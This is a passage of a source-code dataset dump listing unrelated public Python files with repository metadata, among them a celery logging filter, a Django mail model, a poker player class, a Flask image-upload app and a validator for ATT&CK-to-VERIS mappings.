].cuda()
sample["target"] = sample["target"].cuda()
with torch.no_grad():
_, _, report = criterion(model.models[0], sample, False)
for key, value in report.items():
reports[key].append(value)
for key in ("loss", "nll_loss"):
for value, (sent_id, _) in zip(
torch.cat(reports[key]), real_targets.items()
):
batch_results[sent_id][key][context_bias] = float(value)
for sent_id, value in batch_results.items():
results[doc_id][sent_id] = value
self.dump(dict(results))
| 42.868545 | 88 | 0.54419 | 8,702 | 0.953017 | 0 | 0 | 0 | 0 | 0 | 0 | 507 | 0.055525 |
33b33555cc6216929a203498dda0d15a42f493e0 | 855 | py | Python | log_task_id.py | Sendhub/flashk_util | fe42c117be6a9e9655e38cd48a3104b6144873ba | [
"BSD-3-Clause"
] | null | null | null | log_task_id.py | Sendhub/flashk_util | fe42c117be6a9e9655e38cd48a3104b6144873ba | [
"BSD-3-Clause"
] | 1 | 2016-01-20T22:13:53.000Z | 2016-01-20T22:13:53.000Z | log_task_id.py | Sendhub/flashk_util | fe42c117be6a9e9655e38cd48a3104b6144873ba | [
"BSD-3-Clause"
] | null | null | null | import logging
from celery._state import get_current_task
class TaskIDFilter(logging.Filter):
"""
Adds celery contextual information to a log record, if appropriate.
https://docs.python.org/2/howto/logging-cookbook.html
#using-filters-to-impart-contextual-information
"""
def filter(self, record):
"""
Checks for a currently executing celery task and adds the name and
id to the log record.
:param record:
:return:
"""
task = get_current_task()
if task and hasattr(task, 'request') and task.request:
record.__dict__.update(task_id=task.request.id,
task_name=task.name)
else:
record.__dict__.setdefault('task_name', '')
record.__dict__.setdefault('task_id', '')
return True
| 27.580645 | 74 | 0.612865 | 794 | 0.928655 | 0 | 0 | 0 | 0 | 0 | 0 | 387 | 0.452632 |
33b43ed36a9638956d846bca8d46fb665ecc2a68 | 2,295 | py | Python | e/mail-relay/web/apps/localized_mail/models.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | null | null | null | e/mail-relay/web/apps/localized_mail/models.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | 18 | 2020-06-05T18:17:40.000Z | 2022-03-11T23:25:21.000Z | e/mail-relay/web/apps/localized_mail/models.py | zhouli121018/nodejsgm | 0ccbc8acf61badc812f684dd39253d55c99f08eb | [
"MIT"
] | null | null | null | #coding=utf-8
import os
from django.db import models
from django.contrib.auth.models import User
from django.conf import settings
from apps.core.models import Customer
CHECK_RESULT = (
('', '--'),
('high_risk', u'高危邮件'),
('sender_blacklist', u'发件黑'),
('keyword_blacklist', u'内容黑'),
('subject_blacklist', u'主题黑'),
('subject_and_keyword', u'主题和内容关键字'),
('cyber_spam', u'CYBER-Spam'),
('spamassassin', u'垃邮(spamassassin)'),
('error', u'检测出错'),
('c_sender_blacklist', u'发件人黑名单'),
)
MAIL_STATE = (
('', '--'),
('review', u'等待审核'),
('pass', u'审核已通过'),
('reject', u'审核已拒绝'),
('passing', u'审核通过中'),
('rejecting', u'审核拒绝中'),
)
MAIL_ORIGIN = (
('', '--'),
('collect', u'网关'),
('relay', u'中继'),
)
class LocalizedMail(models.Model):
customer = models.ForeignKey(Customer, on_delete=models.DO_NOTHING, null=True, blank=True)
check_result = models.CharField(u'检测结果', max_length=20, null=True, blank=True, choices=CHECK_RESULT, db_index=True)
check_message = models.TextField(u'检测详细结果', null=True, blank=True)
created = models.DateTimeField(u'创建日期', auto_now_add=True)
mail_from = models.CharField(u'发件人', max_length=150, null=True, blank=True)
mail_to = models.CharField(u'收件人', max_length=150, null=True, blank=True)
subject = models.CharField(u'主题', max_length=800, null=True, blank=True)
state = models.CharField(u'状态', max_length=20, default='review', choices=MAIL_STATE, db_index=True)
size = models.IntegerField(u'邮件大小', default=0)
reviewer = models.ForeignKey(User, on_delete=models.DO_NOTHING, null=True, blank=True)
review_time = models.DateTimeField(u'审核时间', null=True, blank=True)
mail_id = models.CharField(u'客户邮件ID', max_length=20, null=True, blank=True)
origin = models.CharField(u'来源', max_length=20, choices=MAIL_ORIGIN, default='collect', db_index=True)
created_date = models.DateField(u'创建日期', auto_now_add=True, db_index=True)
def get_mail_content(self):
file_path = self.get_mail_path()
return open(file_path, 'r').read() if os.path.exists(file_path) else ''
def get_mail_path(self):
print os.path.join(settings.DATA_LOCALIZED_PATH, str(self.id))
return os.path.join(settings.DATA_LOCALIZED_PATH, str(self.id))
| 38.898305 | 119 | 0.67756 | 1,612 | 0.644542 | 0 | 0 | 0 | 0 | 0 | 0 | 671 | 0.268293 |
33b740adf83b98dff3bbdd2ad1fbbad7dd39228a | 2,691 | py | Python | src/softfab/pages/InspectDone.py | boxingbeetle/softfab | 0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14 | [
"BSD-3-Clause"
] | 20 | 2019-02-07T17:03:04.000Z | 2020-03-16T20:45:19.000Z | src/softfab/pages/InspectDone.py | boxingbeetle/softfab | 0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14 | [
"BSD-3-Clause"
] | 36 | 2019-02-11T08:57:16.000Z | 2020-09-29T05:32:08.000Z | src/softfab/pages/InspectDone.py | boxingbeetle/softfab | 0ecf899f66a1fb046ee869cbfa3b5374b3f8aa14 | [
"BSD-3-Clause"
] | null | null | null | # SPDX-License-Identifier: BSD-3-Clause
from typing import ClassVar, Mapping, cast
from softfab.ControlPage import ControlPage
from softfab.Page import InvalidRequest, PageProcessor
from softfab.pageargs import DictArg, EnumArg, StrArg
from softfab.pagelinks import TaskIdArgs
from softfab.request import Request
from softfab.response import Response
from softfab.resultcode import ResultCode
from softfab.resultlib import ResultStorage
from softfab.tasktables import TaskProcessorMixin
from softfab.users import User, checkPrivilege, checkPrivilegeForOwned
from softfab.xmlgen import xml
class InspectDone_POST(ControlPage['InspectDone_POST.Arguments',
'InspectDone_POST.Processor']):
class Arguments(TaskIdArgs):
result = EnumArg(ResultCode)
summary = StrArg(None)
data = DictArg(StrArg())
class Processor(TaskProcessorMixin,
PageProcessor['InspectDone_POST.Arguments']):
resultStorage: ClassVar[ResultStorage]
async def process(self,
req: Request['InspectDone_POST.Arguments'],
user: User
) -> None:
# Fetch and check job and task.
self.initTask(req)
job = self.job
task = self.task
taskName = task.getName()
taskRun = task.getLatestRun()
if not taskRun.isWaitingForInspection():
raise InvalidRequest(
'Given task is not waiting for inspection'
)
# Check result and summary.
result = req.args.result
if result not in (
ResultCode.OK, ResultCode.WARNING, ResultCode.ERROR
):
raise InvalidRequest(f'Invalid inspection result "{result}"')
summary = req.args.summary
# Check store permissions.
checkPrivilegeForOwned(user, 't/m', job)
# Store mid-level data, if any.
data = cast(Mapping[str, str], req.args.data)
if data:
self.resultStorage.putData(taskName, taskRun.getId(), data)
# Store inspection result.
job.inspectDone(taskName, result, summary)
def checkAccess(self, user: User) -> None:
# Error messages might leak info about job/task existence, so make sure
# at least read-only access is allowed.
# The processor will do additional checks.
checkPrivilege(user, 'j/l')
checkPrivilege(user, 't/l')
async def writeReply(self, response: Response, proc: Processor) -> None:
response.writeXML(xml.ok)
| 36.364865 | 79 | 0.623932 | 2,097 | 0.779264 | 0 | 0 | 0 | 0 | 1,361 | 0.50576 | 540 | 0.200669 |
33b8da2d72ef09ad6eef64de8e3cb74d42aa9d37 | 414 | py | Python | src/uwds3_core/estimation/dense_optical_flow_estimator.py | underworlds-robot/uwds3_core | 3aec39f83ec5ba2c0b70485aa23bf6eeaedeeda7 | [
"MIT"
] | 1 | 2021-06-08T02:55:15.000Z | 2021-06-08T02:55:15.000Z | src/uwds3_core/estimation/dense_optical_flow_estimator.py | underworlds-robot/uwds3_core | 3aec39f83ec5ba2c0b70485aa23bf6eeaedeeda7 | [
"MIT"
] | null | null | null | src/uwds3_core/estimation/dense_optical_flow_estimator.py | underworlds-robot/uwds3_core | 3aec39f83ec5ba2c0b70485aa23bf6eeaedeeda7 | [
"MIT"
] | null | null | null | import cv2
class DenseOpticalFlowEstimator(object):
def __init__(self):
self.previous_frame = None
def estimate(self, frame):
if first_frame is None:
return None
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
flow = cv2.calcOpticalFlowFarneback(self.previous_frame, gray, None, 0.5, 1, 20, 1, 5, 1.2, 0)
self.previous_frame = gray
return flow
| 27.6 | 102 | 0.644928 | 400 | 0.966184 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33bb74b917e15d0d3580148ef539ee108a577454 | 2,071 | py | Python | 2020/day-22/day-22.py | mrMetalWood/advent-of-code | b850aa50474c622e23e924c5da53775b4cae05b2 | [
"MIT"
] | 1 | 2018-12-02T12:38:31.000Z | 2018-12-02T12:38:31.000Z | 2020/day-22/day-22.py | mrMetalWood/advent-of-code | b850aa50474c622e23e924c5da53775b4cae05b2 | [
"MIT"
] | 7 | 2020-07-16T14:03:31.000Z | 2020-12-02T10:46:49.000Z | 2020/day-22/day-22.py | mrMetalWood/advent-of-code | b850aa50474c622e23e924c5da53775b4cae05b2 | [
"MIT"
] | null | null | null | import os
from copy import deepcopy
with open(os.path.join(os.path.dirname(__file__), "input.txt"), "r") as file:
lines = [l.strip() for l in file.readlines()]
p1 = list(reversed([int(i) for i in lines[1:26]]))
p2 = list(reversed([int(i) for i in lines[28:]]))
def part1(player1, player2):
while player1 and player2:
p1_card = player1.pop()
p2_card = player2.pop()
if p1_card > p2_card:
player1.insert(0, p1_card)
player1.insert(0, p2_card)
else:
player2.insert(0, p2_card)
player2.insert(0, p1_card)
winning_player = player1 or player2
ans = 0
for idx, card in enumerate(winning_player):
ans += (idx + 1) * card
return ans
def part2(player1, player2):
def game(pl1, pl2):
history = set()
while pl1 and pl2:
current = "".join([str(i) for i in pl1]) + "".join([str(i) for i in pl1])
if current in history:
return "p1"
else:
history.add(current)
p1_card = pl1.pop()
p2_card = pl2.pop()
winner = ""
if len(pl1) >= p1_card and len(pl2) >= p2_card:
winner = game(deepcopy(pl1[-p1_card:]), deepcopy(pl2[-p2_card:]))
else:
if p1_card > p2_card:
winner = "p1"
else:
winner = "p2"
if winner == "p1":
pl1.insert(0, p1_card)
pl1.insert(0, p2_card)
else:
pl2.insert(0, p2_card)
pl2.insert(0, p1_card)
return "p1" if pl1 else "p2"
winning_player = game(player1, player2)
if winning_player == "p1":
winning_player = player1
else:
winning_player = player2
ans = 0
for idx, card in enumerate(winning_player):
ans += (idx + 1) * card
return ans
print(f"Part 1: {part1(deepcopy(p1), deepcopy(p2))}") # 35202
print(f"Part 2: {part2(deepcopy(p1), deepcopy(p2))}") # 32317
| 27.25 | 85 | 0.522453 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 154 | 0.07436 |
33bd39e35c4992a15a6d443f02ff02fed9014dd8 | 2,075 | py | Python | Exercise05/5-30.py | ywyz/IntroducingToProgrammingUsingPython | 614d59eacb7e37aece871a00f7d1518f7de88708 | [
"Apache-2.0"
] | null | null | null | Exercise05/5-30.py | ywyz/IntroducingToProgrammingUsingPython | 614d59eacb7e37aece871a00f7d1518f7de88708 | [
"Apache-2.0"
] | null | null | null | Exercise05/5-30.py | ywyz/IntroducingToProgrammingUsingPython | 614d59eacb7e37aece871a00f7d1518f7de88708 | [
"Apache-2.0"
] | null | null | null | '''
@Date: 2019-11-02 09:19:19
@Author: ywyz
@LastModifiedBy: ywyz
@Github: https://github.com/ywyz
@LastEditors: ywyz
@LastEditTime: 2019-11-02 10:13:44
'''
year = eval(input("Enter the year: "))
day = eval(input("Enter the day of the week: "))
for months in range(1, 13):
if months == 1:
month = "January"
dayOfMonths = 31
firstday = day
elif months == 2:
month = "February"
if (year % 400 == 0 or (year % 4 == 0 and year % 100 != 0)):
dayOfMonths = 29
else:
dayOfMonths = 28
elif months == 3:
month = "March"
dayOfMonths = 31
elif months == 4:
month = "April"
dayOfMonths = 30
elif months == 5:
month = "May"
dayOfMonths = 31
elif months == 6:
month = "June"
dayOfMonths = 30
elif months == 7:
month = "July"
dayOfMonths = 31
elif months == 8:
month = "Augest"
dayOfMonths = 31
elif months == 9:
month = "September"
dayOfMonths = 30
elif months == 10:
month = "October"
dayOfMonths = 31
elif months == 11:
month = "November"
dayOfMonths = 30
elif months == 12:
month = "December"
dayOfMonths = 31
if firstday == 1:
dayOfWeek = "Monday"
print(month, " . 1", year, "is ", dayOfWeek)
elif firstday == 2:
dayOfWeek = "Tuesday"
print(month, " . 1", year, "is ", dayOfWeek)
elif firstday == 3:
dayOfWeek = "Wednesday"
print(month, " . 1", year, "is ", dayOfWeek)
elif firstday == 4:
dayOfWeek = "Thursday"
print(month, " . 1", year, "is ", dayOfWeek)
elif firstday == 5:
dayOfWeek = "Friday"
print(month, " . 1", year, "is ", dayOfWeek)
elif firstday == 6:
dayOfWeek = "Saturday"
print(month, " . 1", year, "is ", dayOfWeek)
elif firstday == 0:
dayOfWeek = "Sunday"
print(month, " . 1", year, "is ", dayOfWeek)
firstday = (firstday + dayOfMonths) % 7
| 26.948052 | 68 | 0.52 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 443 | 0.213494 |
33be9763c347a4744c14215a01a14f94308620b5 | 587 | py | Python | insights_messaging/downloaders/s3.py | dpensi/insights-core-messaging | a964cecdf5cbb57407dae9e9208a31fc5e9318e4 | [
"Apache-2.0"
] | 6 | 2019-12-12T14:19:30.000Z | 2020-04-08T16:20:04.000Z | insights_messaging/downloaders/s3.py | dpensi/insights-core-messaging | a964cecdf5cbb57407dae9e9208a31fc5e9318e4 | [
"Apache-2.0"
] | 14 | 2020-01-27T17:04:39.000Z | 2021-03-16T15:18:30.000Z | insights_messaging/downloaders/s3.py | dpensi/insights-core-messaging | a964cecdf5cbb57407dae9e9208a31fc5e9318e4 | [
"Apache-2.0"
] | 13 | 2019-12-16T09:32:38.000Z | 2021-05-05T12:39:38.000Z | import shutil
from contextlib import contextmanager
from tempfile import NamedTemporaryFile
from s3fs import S3FileSystem
class S3Downloader:
def __init__(self, tmp_dir=None, chunk_size=16 * 1024, **kwargs):
self.tmp_dir = tmp_dir
self.chunk_size = chunk_size
self.fs = S3FileSystem(**kwargs)
@contextmanager
def get(self, src):
with self.fs.open(src) as s:
with NamedTemporaryFile(dir=self.tmp_dir) as d:
shutil.copyfileobj(s, d, length=self.chunk_size)
d.flush()
yield d.name
| 26.681818 | 69 | 0.647359 | 460 | 0.783646 | 236 | 0.402044 | 256 | 0.436116 | 0 | 0 | 0 | 0 |
33bea67e17e2e48816f3acbadb4afec665fa95a1 | 142 | py | Python | Code/hypers.py | taoqi98/KIM | dc897026d5a639a9a554d06ac036b121fcbcf6a0 | [
"MIT"
] | 7 | 2021-08-13T12:43:17.000Z | 2022-03-24T11:25:52.000Z | Code/hypers.py | JulySinceAndrew/KIM-SIGIR-2021 | 87b1c21f79a5389cc4a0d122e7ded5f63a63da28 | [
"MIT"
] | 5 | 2021-07-20T07:27:05.000Z | 2022-02-25T07:28:39.000Z | Code/hypers.py | JulySinceAndrew/KIM-SIGIR-2021 | 87b1c21f79a5389cc4a0d122e7ded5f63a63da28 | [
"MIT"
] | null | null | null | MAX_SENTENCE = 30
MAX_ALL = 50
MAX_SENT_LENGTH=MAX_SENTENCE
MAX_SENTS=MAX_ALL
max_entity_num = 10
num = 100
num1 = 200
num2 = 100
npratio=4
| 11.833333 | 28 | 0.774648 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
33bf14c77a779be90d64a6d8759da4a08a0088fa | 1,022 | py | Python | ai-control/mirror.py | futurice/maximum-aittack | 6b39e7987f6c142cc80f186043c4348f01743850 | [
"MIT"
] | null | null | null | ai-control/mirror.py | futurice/maximum-aittack | 6b39e7987f6c142cc80f186043c4348f01743850 | [
"MIT"
] | null | null | null | ai-control/mirror.py | futurice/maximum-aittack | 6b39e7987f6c142cc80f186043c4348f01743850 | [
"MIT"
] | null | null | null | import os, json
from PIL import Image
import numpy as np
from skimage import io
basePath = './log/log_joku/'
json_files = [pos_json for pos_json in os.listdir(basePath) if pos_json.endswith('.json')]
for file in json_files:
if file != 'meta.json':
#print(file)
with open(basePath + file) as f:
data = json.load(f)
index = data.get('cam/image_array').split('_')[1].split('.')[0]
if (int(index) % 1000) == 0:
print(index)
#print(index)
imgPath = basePath + data.get('cam/image_array')
img = Image.open(imgPath)
imgFlipped = np.fliplr(img)
flippedImgName = 'shotflipped_' + index + '.png'
io.imsave(basePath + flippedImgName, imgFlipped)
data['cam/image_array'] = flippedImgName
data['user/angle'] = data.get('user/angle') * -1
with open(basePath + 'recordflipped_' + index + '.json', 'w') as outfile:
json.dump(data, outfile)
| 37.851852 | 90 | 0.572407 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 187 | 0.182975 |
33c1247fa87d16457ea55bc1e3f8ebb9f2eb5bf2 | 21 | py | Python | portfolios/trader/__init__.py | ahwkuepper/portfolio | 4ab6eebbb36c6064d58df62dbe931ead3b297be4 | [
"BSD-3-Clause"
] | 4 | 2020-08-18T09:52:37.000Z | 2021-03-26T19:59:03.000Z | portfolios/trader/__init__.py | ahwkuepper/portfolio | 4ab6eebbb36c6064d58df62dbe931ead3b297be4 | [
"BSD-3-Clause"
] | 4 | 2019-07-06T17:48:46.000Z | 2020-05-11T01:40:18.000Z | portfolios/trader/__init__.py | ahwkuepper/portfolio | 4ab6eebbb36c6064d58df62dbe931ead3b297be4 | [
"BSD-3-Clause"
] | 2 | 2019-02-28T08:02:47.000Z | 2019-07-09T04:23:23.000Z | __all__ = ["orders"]
| 10.5 | 20 | 0.619048 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 | 0.380952 |
33c380aba8f0a3a85e233adf8c61cab373192d50 | 5,474 | py | Python | gym_holdem/holdem/player.py | pokeraigym/PokerAI | 8f768704aaacf40c39af724c4d3cc1c68db58b00 | [
"MIT"
] | null | null | null | gym_holdem/holdem/player.py | pokeraigym/PokerAI | 8f768704aaacf40c39af724c4d3cc1c68db58b00 | [
"MIT"
] | null | null | null | gym_holdem/holdem/player.py | pokeraigym/PokerAI | 8f768704aaacf40c39af724c4d3cc1c68db58b00 | [
"MIT"
] | null | null | null | from gym_holdem.holdem.bet_round import BetRound
from gym_holdem.holdem.poker_rule_violation_exception import PokerRuleViolationException
from pokereval_cactus import Card
class Player:
def __init__(self, stakes, table=None, name=None):
self.table = table
self.name = name
self.bet = 0
self.hand = []
self.stakes = stakes
self._has_called = False
self.hand = None
def reset(self, stakes=0):
self.bet = 0
self.hand = []
self.stakes = stakes
self._has_called = False
self.hand = None
def action_from_amount(self, amount):
self._check_player_may_act()
# CHECK || FOLD
if amount == 0:
if self.to_call_amount() == 0:
self.call_check()
else:
self.fold()
return
# CALL || RAISE
delta = amount - self.to_call_amount()
# IF ALL-IN
if amount == self.stakes:
if delta <= 0:
self.call_check()
else:
self.raise_bet(amount)
else:
if delta == 0:
self.call_check()
elif delta > 0:
self.raise_bet(amount)
else:
raise PokerRuleViolationException(f"Cannot bet less than to call amount: amount=={amount}, to_call=={self.to_call_amount()}")
def call_check(self):
self._check_player_may_act()
amount = self.to_call_amount()
# If player must go All-in to call
if amount > self.stakes:
amount = self.stakes
self._bet(amount)
self._has_called = True
self.table.set_next_player()
def raise_bet(self, amount):
self._check_player_may_act()
delta = amount - self.to_call_amount()
if delta <= 0:
raise PokerRuleViolationException(f"Raise amount is smaller than or equal to to_call amount, consider calling instead: to_call=={self.to_call_amount()}, amount=={amount}")
if amount > self.stakes:
raise PokerRuleViolationException("Cant bet more than he has got")
# NOT ALL IN
if amount < self.stakes:
if delta < self.table.last_bet_raise_delta:
raise PokerRuleViolationException(f"Delta amount of bet/raise must be at least the last delta amount, delta== {delta}, last_delta=={self.table.last_bet_raise_delta}")
self.table.last_bet_raise = delta
# ALL IN --> self.stakes == amount
else:
if delta > self.table.last_bet_raise_delta:
self.table.last_bet_raise_delta = delta
self.table.reset_players_called_var()
self._bet(amount)
self._has_called = True
self.table.set_next_player()
def fold(self):
self._check_player_may_act()
self._has_called = False
del self.table.active_players[self.table.next_player_idx]
# self.table.active_players.remove(self)
self.table.set_next_player(folded=True)
def _bet(self, amount):
if amount > self.stakes:
raise PokerRuleViolationException("Can't bet more than he has got")
if amount < 0:
raise PokerRuleViolationException("Can't bet less than 0")
self.bet += amount
self.stakes -= amount
self.table.bet(amount, self)
@property
def is_all_in(self):
return self.stakes == 0
def bet_small_blind(self):
if self.table.small_blind <= self.stakes:
# print("SB HEY I AM THE TABLE SMALL BLIND")
amount = self.table.small_blind
else:
# print("SB HEY I AM THE STAKES")
amount = self.stakes
# print("sb amount", amount)
self._bet(amount)
def bet_big_blind(self):
if self.table.big_blind <= self.stakes:
# print("BB HEY I AM THE TABLE BIG BLIND")
amount = self.table.big_blind
else:
# print("BB HEY I AM THE STAKES")
amount = self.stakes
# print("bb amount", amount)
self._bet(amount)
@property
def has_called(self):
return self._has_called or self.is_all_in
def to_call_amount(self):
if self.table.current_pot.highest_bet >= self.table.big_blind:
to_call = self.table.current_pot.highest_bet - self.bet
else:
to_call = self.table.big_blind - self.bet
return to_call
def _check_player_may_act(self):
if self.has_called:
raise PokerRuleViolationException("This Player has already called")
if self.table.bet_round == BetRound.SHOWDOWN or self.table.bet_round == BetRound.GAME_OVER:
raise PokerRuleViolationException("Cannot bet, round is over")
if self.table.next_player_idx == -1:
raise PokerRuleViolationException("This betround has already ended")
if self != self.table.next_player:
raise PokerRuleViolationException("It's not this players turn")
def __str__(self):
if self.name:
return f"""Player {self.name}: bet=={self.bet}, \nstakes=={self.stakes},\n hand=={Card.print_pretty_cards(self.hand)}, \n
_has_called=={self._has_called}\n"""
else:
return f"Anonymous Player: bet=={self.bet}\n, stakes=={self.stakes}\n, hand=={Card.print_pretty_cards(self.hand)}\n"
| 33.175758 | 183 | 0.598465 | 5,298 | 0.967848 | 0 | 0 | 151 | 0.027585 | 0 | 0 | 1,212 | 0.22141 |
33c4d9cd799c0848aed6273bf409593aceac5368 | 1,441 | py | Python | app.py | abdur75648/ai-image-generator | 82b10d1360efb2af9afbc580744eca4d9763c687 | [
"MIT"
] | null | null | null | app.py | abdur75648/ai-image-generator | 82b10d1360efb2af9afbc580744eca4d9763c687 | [
"MIT"
] | null | null | null | app.py | abdur75648/ai-image-generator | 82b10d1360efb2af9afbc580744eca4d9763c687 | [
"MIT"
] | 1 | 2022-03-05T20:48:08.000Z | 2022-03-05T20:48:08.000Z | from flask import Flask, request, send_from_directory, redirect, send_file, render_template
import os,cv2
import neuralStyleProcess
app = Flask(__name__)
APP_ROOT = os.path.dirname(os.path.abspath(__file__))
@app.route("/")
def index():
return render_template("upload.html")
@app.route("/upload", methods=['POST'])
def upload():
target = os.path.join(APP_ROOT, 'images/')
print("TARGET", target)
if not os.path.isdir(target):
os.mkdir(target)
else:
print("Couldn't create upload directory: {}".format(target))
data = request.form.get("style")
print(data)
myFiles = []
for file in request.files.getlist("file"):
print("file", file)
filename = file.filename
print("filename", filename)
destination = "".join([target, filename])
print("destination", destination)
file.save(destination)
myFiles.append(filename)
print(myFiles)
return render_template("complete.html", image_names=myFiles, selected_style=data)
# This function takes the parameter name <filename>
@app.route('/upload/<filename>')
def send_original_image(filename):
return send_from_directory("images", filename)
@app.route('/complete/<filename>/<selected_style>')
def send_processed_image(filename, selected_style):
directoryName = os.path.join(APP_ROOT, 'images/')
newImg = neuralStyleProcess.neuralStyleTransfer(directoryName, filename, selected_style)
return send_from_directory("images", newImg)
if __name__ == '__main__':
app.run()
| 30.020833 | 91 | 0.746704 | 0 | 0 | 0 | 0 | 1,130 | 0.784178 | 0 | 0 | 290 | 0.201249 |
33c563ef96dc01994469a37d5d17819ff8a430d8 | 9,678 | py | Python | src/mappings_validator.py | center-for-threat-informed-defense/attack_to_veris | e5305debf7b5eb35704628dd02d3ce0d45ee0e32 | [
"Apache-2.0"
] | 35 | 2021-08-28T05:11:11.000Z | 2022-02-24T05:50:59.000Z | src/mappings_validator.py | center-for-threat-informed-defense/attack_to_veris | e5305debf7b5eb35704628dd02d3ce0d45ee0e32 | [
"Apache-2.0"
] | 1 | 2021-09-16T00:32:19.000Z | 2021-09-16T00:35:59.000Z | src/mappings_validator.py | center-for-threat-informed-defense/attack_to_veris | e5305debf7b5eb35704628dd02d3ce0d45ee0e32 | [
"Apache-2.0"
] | 1 | 2021-12-07T13:10:12.000Z | 2021-12-07T13:10:12.000Z | # Copyright (c) 2021, MITRE Engenuity. Approved for public release.
# See LICENSE for complete terms.
import argparse
import json
import pathlib
import numpy
import requests
from src.create_mappings import get_sheets, get_sheet_by_name
def get_argparse():
desc = "ATT&CK to VERIS Mappings Validator"
argparser = argparse.ArgumentParser(description=desc)
argparser.add_argument(
"-config-location",
dest="config_location",
type=lambda path: pathlib.Path(path),
default=pathlib.Path("..", "frameworks", "veris", "input", "config.json"),
help="The path to the config metadata location.",
)
argparser.add_argument(
"-spreadsheet-location",
dest="spreadsheet_location",
type=lambda path: pathlib.Path(path),
default=pathlib.Path("..", "frameworks", "veris", "veris-mappings.xlsx"),
help="The path to the spreadsheet mappings location.",
)
argparser.add_argument(
"-json-location",
dest="json_location",
type=lambda path: pathlib.Path(path),
default=pathlib.Path("..", "frameworks", "veris", "veris-mappings.json"),
help="The path to the JSON mappings location.",
)
argparser.add_argument(
"-attack-version",
dest="attack_version",
type=str,
default="9.0",
help="The ATT&CK release version to use.",
)
argparser.add_argument(
"-veris-version",
dest="veris_version",
type=str,
default="1.3.5",
help="The VERIS release version to use.",
)
argparser.add_argument(
"-metadata-version",
dest="metadata_version",
type=str,
default="1.9",
help="The Metadata version to check against.",
)
return argparser
def get_mappings_file(mappings_location):
"""Returns the ATT&CK VERIS mappings JSON file"""
path_obj = pathlib.Path(mappings_location).resolve()
with path_obj.open(encoding="utf-8") as f:
return json.load(f)
def get_veris_enum():
"""Downloads the latest VERIS enum"""
veris_enum_dict = requests.get(
"https://raw.githubusercontent.com/vz-risk/VCDB/1.3.5/vcdb-labels.json",
verify=True,
).json()
return veris_enum_dict
def get_stix2_source(attack_version):
"""Downloads ATT&CK knowledge base using the provided version"""
attackid_to_stixid = {}
stix_bundle = requests.get(
f"https://raw.githubusercontent.com/mitre/cti/ATT%26CK-v{attack_version}/"
f"enterprise-attack/enterprise-attack.json",
verify=True,
).json()
for attack_object in stix_bundle["objects"]:
if attack_object["type"] == "attack-pattern":
if "external_references" not in attack_object:
continue # skip objects without IDs
if attack_object.get("revoked", False):
continue # skip revoked objects
if attack_object.get("x_mitre_deprecated", False):
continue # skip deprecated objects
# map attack ID to stix ID
attackid_to_stixid[attack_object["external_references"][0]["external_id"]] = attack_object["id"]
return attackid_to_stixid
def validate_json_mappings_metadata(mappings_location, attack_version, veris_version, metadata_version):
"""Checks for presence and correct metadata information in the mappings JSON file."""
mappings_dict = get_mappings_file(mappings_location)
# Checks presence of metadata key
assert mappings_dict, "[-] No Metadata Found..."
if "metadata" in mappings_dict:
mappings_dict = mappings_dict["metadata"]
# Checks metadata info matches the validator options
assert attack_version == mappings_dict["attack_version"], "[-] ATT&CK Version does not match JSON contents"
assert veris_version == mappings_dict["veris_version"], "[-] VERIS Version does not match JSON contents"
assert metadata_version == mappings_dict["mappings_version"], "[-] Metadata Version does not match JSON contents"
def validate_spreadsheet_mappings_metadata(spreadsheet_location, attack_version, veris_version, metadata_version):
"""Checks for presence and correct metadata information in the mappings spreadsheet."""
sheet_data = get_sheet_by_name(spreadsheet_location, "Metadata")
# Checks presence of metadata key
assert sheet_data.empty is False, "[-] No Metadata Found..."
for idx, row in sheet_data.iterrows():
# Checks metadata info matches the validator options
# Need to track specific rows/cells to make the chec
if idx == 6:
test_attack_version, test_attack_version_value = row[3], row[5]
assert "ATT&CK version" == test_attack_version,\
"[-] Spreadsheet contents does not match ATT&CK version cell"
assert attack_version == str(test_attack_version_value),\
"[-] ATT&CK Version does not match Spreadsheet contents"
if idx == 7:
test_veris_version, test_veris_version_value = row[3], row[5]
assert "VERIS version" == test_veris_version,\
"[-] Spreadsheet contents does not match VERIS version cell"
assert veris_version == str(test_veris_version_value),\
"[-] VERIS Version does not match Spreadsheet contents"
if idx == 8:
test_mappings_version, test_mappings_version_value = row[3], row[5]
assert "Mapping version" == test_mappings_version,\
"[-] Spreadsheet contents does not match Mappings version cell"
assert metadata_version == str(test_mappings_version_value),\
"[-] Mappings version does not match Spreadsheet contents"
if idx == 9:
text_spreadsheet_version, test_spreadsheet_version_value = row[3], row[5]
assert "Spreadsheet version" == text_spreadsheet_version,\
"[-] Spreadsheet contents does not match Spreadsheet version cell"
assert metadata_version == str(test_spreadsheet_version_value),\
"[-] Spreadsheet version does not match Spreadsheet contents "
def validate_mapping_entries(spreadsheet_location, attack_version):
"""Walks over forward and reverse mappings checking the ATT&CK entry is valid.
1) The ATT&CK ID is correct 2) The ATT&CK name is correct 3) The VERIS path is correct"""
attack_source = get_stix2_source(attack_version)
veris_enum = get_veris_enum()
sheets = get_sheets(spreadsheet_location)
print("\t\t[+] VERIS to ATT&CK mappings check...")
fail_test = False
for sheet, name in sheets:
name = name.lower()
print(f"\t\t\t[+] checking sheet: {name}")
veris_path = None
unique_per_veris_entry = {}
for idx, row in sheet.iterrows():
if row[0] is not numpy.nan:
veris_path = f'{name}.{row[0]}'
check_unique = True
else:
check_unique = False
attack_technique = row[1]
if attack_technique is numpy.nan:
# Don't validate the attack_technique if the cell is blank (aka is numpy.nan)
pass
elif attack_technique not in attack_source:
print(f"[-] In Sheet '{name}', under '{veris_path}', "
f"the technique ID '{attack_technique}' is invalid (revoked or deprecated)")
fail_test = True
if check_unique and veris_path in unique_per_veris_entry:
print(f"[-] In Sheet '{name}', under '{veris_path}', "
f"the veris path is duplicated")
fail_test = True
if veris_path not in unique_per_veris_entry:
unique_per_veris_entry[veris_path] = set()
